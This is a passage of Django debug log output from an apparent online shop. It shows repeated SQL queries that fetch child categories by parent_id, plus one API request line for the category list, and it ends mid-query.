(0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 07:36:39,642 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 07:36:39,646 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 07:36:39,648 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 07:36:39,650 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 07:36:39,652 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 07:36:39,655 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 07:36:39,658 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 07:36:39,660 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 07:36:39,662 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 07:36:39,664 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 07:36:39,667 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 07:36:39,670 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 07:36:39,672 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 07:36:39,674 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 07:36:39,676 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 07:36:39,679 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 07:36:39,682 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 07:36:39,684 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 07:36:39,687 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 07:36:39,689 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 07:36:39,691 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 07:36:39,693 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 07:36:39,696 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 07:36:39,699 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 07:36:39,701 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 07:36:39,703 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 07:36:39,705 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 07:36:39,708 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 07:36:39,711 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 07:36:39,713 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 07:36:39,715 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 07:36:39,717 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 07:36:39,721 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 07:36:39,723 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 07:36:39,725 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 07:36:39,728 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 07:36:39,730 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 07:36:39,732 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 07:36:39,735 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 07:36:39,737 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 07:36:39,739 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 07:36:39,742 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 07:36:39,745 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 07:36:39] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-31 07:36:42,719 utils 2749 140297212245760 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 07:36:42,727 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 07:36:42,733 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 07:36:42,736 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 07:36:42,739 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 07:36:42,742 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 07:36:42,746 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 07:36:42,750 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 07:36:42,754 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 07:36:42,760 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 07:36:42,764 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 07:36:42,768 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 07:36:42,772 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 07:36:42,776 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 07:36:42,782 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 07:36:42,786 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 07:36:42,790 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 07:36:42,794 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 07:36:42,798 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 07:36:42,805 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 07:36:42,808 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 07:36:42,812 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 07:36:42,816 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 07:36:42,820 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 